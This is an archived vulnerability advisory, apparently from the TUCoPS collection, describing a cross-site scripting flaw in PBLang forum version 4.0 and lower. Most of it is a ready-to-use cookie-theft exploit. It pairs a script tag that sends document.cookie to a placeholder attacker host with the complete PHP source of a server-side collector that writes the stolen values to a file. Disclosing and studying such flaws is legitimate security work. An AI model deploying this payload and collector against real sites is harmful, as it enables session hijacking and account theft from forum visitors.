TUCoPS :: Web BBS :: etc :: bt728.txt

PBLang Forum XSS Vul




PBLang is a web forum written by PHP language. A security vulnerability in 

the product allows posting of HTML code and JavaScript into existing web 

pages thus causing it to be executed on the client end (a Cross-Site 

Scripting vuln).



|--------------------------------------------|



Vulnerable systems: PBLang forum

Version:   4.0 or lower

Website: http://pblang.drmartinus.de/

Problem: Cross Site Scripting (XSS)



|--------------------------------------------|



If someone inserts <script>`anyscript`</script> instead of the post’s 

content, the JavaScript code is executed by Internet Explorer or some 

other web browsers. This allows stealing of cookie data and other 

interesting things… 



Exploit:



Inserting a new topic (or reply) with the following script, it will send 

visitor's cookies to your host. The output is saved to http://your-

host/cookie.txt 



*--------------------------------------------------------------------------

-------------------



<script>window.open("http://your-host/docs.php?docs="+escape

(document.cookie), "subwindows", "height=100,width=486")</script>



---------------------------------------------------------------------------

------------------*



Or insert every scripts – Java and HTML (ex: javascript:history.go(-1), 

window.write(‘Hello world’), javascript:alert(‘Hi!!!’)… )





* Code of docs.php:*



*-------------------------------------------------docs.php-----------------

-------------------------------

<?php

//Copyright by W_Hat (www.pcworldvn.com)

define ("LINE", "\r\n");

define ("HTML_LINE", "<br>"); 

function getvars($arr, $title)

{

$res = "";

$len = count($arr);

if ($len>0)

{

if (strlen($title)>0)

{

print("[--------$title--------]" . HTML_LINE);

$res .= "[--------$title--------]" . LINE;

}

foreach ($arr as $key => $value)

{

print("[$key]" . HTML_LINE);

print($arr[$key] . HTML_LINE);

$res .= "[$key]" . LINE . $arr[$key] . LINE;

}

}

return $res;

} 

// get current date

$now = date("Y-m-d H:i:s"); 

// init

$myData = "[-----$now-----]" . LINE; 

// get

$myData .= getvars($HTTP_GET_VARS, ""); 

// file

$file = $REMOTE_ADDR . "cookie.txt";

$mode = "r+";

if (!file_exists($file))

$mode = "w+";

$fp = fopen ($file, $mode);

fseek($fp, 0, SEEK_END);

fwrite($fp, $myData);

fclose($fp);

?>

-------------------------------------------------docs.php------------------

------------------------------*





Name: Quan Van Truong

E-Mail: quan_vu_208cn@yahoo.com

Occupation: Bug Hunter


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH